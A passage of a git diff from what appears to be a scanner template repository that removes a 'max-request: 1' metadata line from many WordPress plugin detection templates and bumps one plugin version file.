 .../wordpress/plugins/mailchimp-for-woocommerce.yaml           | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml      | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml              | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml           | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml          | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml      | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml              | 1 -
 http/technologies/wordpress/plugins/members.yaml               | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml              | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml             | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml            | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml            | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml       | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml           | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml           | 1 -
 .../wordpress/plugins/official-facebook-pixel.yaml             | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml          | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml          | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml    | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml          | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml           | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml         | 1 -
 http/technologies/wordpress/plugins/polylang.yaml              | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml         | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml           | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml             | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml      | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml        | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml           | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml     | 1 -
 http/technologies/wordpress/plugins/redirection.yaml           | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml       | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml              | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml      | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml         | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml           | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml   | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml          | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml            | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml             | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml     | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml        | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml     | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml        | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml           | 1 -
 .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml            | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml  | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml   | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml   | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml      | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml         | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml       | 1 -
 .../wordpress/plugins/under-construction-page.yaml             | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml           | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml          | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml      | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml            | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml        | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml            | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml          | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml            | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml       | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml       | 1 -
 .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml   | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml          | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml  | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml         | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml        | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml  | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml           | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml             | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml    | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml         | 1 -
 http/technologies/wordpress/plugins/worker.yaml                | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml      | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml   | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml              | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-seopress.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml       | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml        | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml          | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml        | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml           | 1 -
 201 files changed, 2 insertions(+), 202 deletions(-)

diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt
index fe36ece50b..e8286351a9 100644
--- a/helpers/wordpress/plugins/newsletter.txt
+++ b/helpers/wordpress/plugins/newsletter.txt
@@ -1 +1 @@
-7.9.4
\ No newline at end of file
+7.9.5
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
